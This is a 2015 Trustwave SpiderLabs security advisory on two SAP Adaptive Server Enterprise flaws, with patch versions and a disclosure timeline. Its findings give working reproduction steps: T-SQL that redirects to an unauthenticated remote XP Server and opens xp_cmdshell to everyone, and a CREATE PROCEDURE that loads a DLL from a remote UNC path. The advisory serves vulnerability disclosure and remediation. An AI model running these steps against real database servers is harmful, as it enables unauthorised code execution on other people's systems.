Trustwave SpiderLabs Security Advisory TWSL2015-015:
Multiple Vulnerabilities in SAP Adaptive Server Enterprise

Published: 07/17/2015
Version: 1.0

Vendor: SAP (www.sap.com)
Product: SAP Adaptive Server Enterprise (ASE)
Version affected: 15.5, 15.7, 16.0

Product description:
Relational database management system for UNIX, Linux, and Microsoft
Windows platforms.

Finding 1: SAP ASE on UNIX/Linux XP Server unauthenticated access vulnerability
Credit: Martin Rakhmanov of Trustwave 

SAP Adaptive Server Enterprise allows unauthenticated connections to the XP
Server.  This means anyone with a network connection to the XP Server can
execute extended stored procedures, including system-provided like
xp_cmdshell. That in turn means arbitrary code execution in the XP Server
process context. Below are step-by-step instructions how to reproduce this
issue against remote XP Server (prerequisite for this is the XP Server
running on a remote host)

On attacker-controlled SAP ASE installation modify the interfaces file to
have an entry that points to the remote XP Server which will be attacked:

[REMOTE_XP]
master=NLWNSCK,REMOTE,5002
query=NLWNSCK,REMOTE,5002

Login to attacker-controlled SAP ASE using 'sa' account and run:

-- start local XP Server to make local database happy
xp_cmdshell '-'
go
-- replace local XP Server with remote one
sp_dropserver LOCAL_XP
go
sp_addserver LOCAL_XP, RPCServer, REMOTE_XP
go
-- Allow anyone run xp_cmdshell 
sp_configure 'xp_cmdshell context', 0
go
sp_configure 'xp_cmdshell context', 1
go
sp_configure 'xp_cmdshell context', 0
go

Reconnect and run:

-- This will produce a file on the remote XP Server host
xp_cmdshell 'id > ~/id.log'
go

Examine remote XP Server filesystem for the id.log file presence.

Finding 2: SAP ASE on UNIX/Linux arbitrary code execution via CREATE PROCEDURE
Credit: Martin Rakhmanov of Trustwave 

CREATE PROCEDURE privilege allows users to create wrappers around native
code placed in libraries accessible to the server. This poses a risk
because any user granted CREATE PROCEDURE can execute arbitrary code in XP
Server's process context by wrapping existing libraries into stored
procedures.  This creates an extended stored procedure bypassing
sp_addextendedproc which requires elevated privileges (sa_role).
Additionally, users granted CREATE PROCEDURE can do this in user databases
overriding system ESPs.  Database owners can run CREATE PROCEDURE as well.

-- This will load kernel32 library from remote host and execute DebugBreak in it
CREATE PROCEDURE DebugBreak AS EXTERNAL NAME "\\SERVER\PATH\kernel32.dll"
go
-- Attach a debugger to XP Server process to observe the break
DebugBreak
go

The above code can be executed as user granted CREATE PROCEDURE privilege
or database owner and will load and run native code from remote box in the
XP Server process context (Windows-specific because of the UNC path).

Remediation Steps:
Apply one of these following vendor supplied patches:

SAP ASE 15.7 SP135
SAP ASE Cluster Edition 15.7 SP135
SAP ASE 16.0 SP01 PL02

Revision History:
03/31/2015 - Finding #1 (SecMsg ID 77045 2015) disclosed to vendor
03/31/2015 - Finding #2 (SecMsg ID 77183 2015) disclosed to vendor
07/14/2015 - Patch released by vendor
07/17/2015 - Advisory published

About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce
security risks. With cloud and managed security services, integrated
technologies and a team of security experts, ethical hackers and
researchers, Trustwave enables businesses to transform the way they manage
their information security and compliance programs while safely embracing
business imperatives including big data, BYOD and social media. More than
2.5 million businesses are enrolled in the Trustwave TrustKeeperÃ‚Â® cloud
platform, through which Trustwave delivers automated, efficient and
cost-effective data protection, risk management and threat intelligence.
Trustwave is a privately held company, headquartered in Chicago, with
customers in 96 countries. For more information about Trustwave, visit
www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.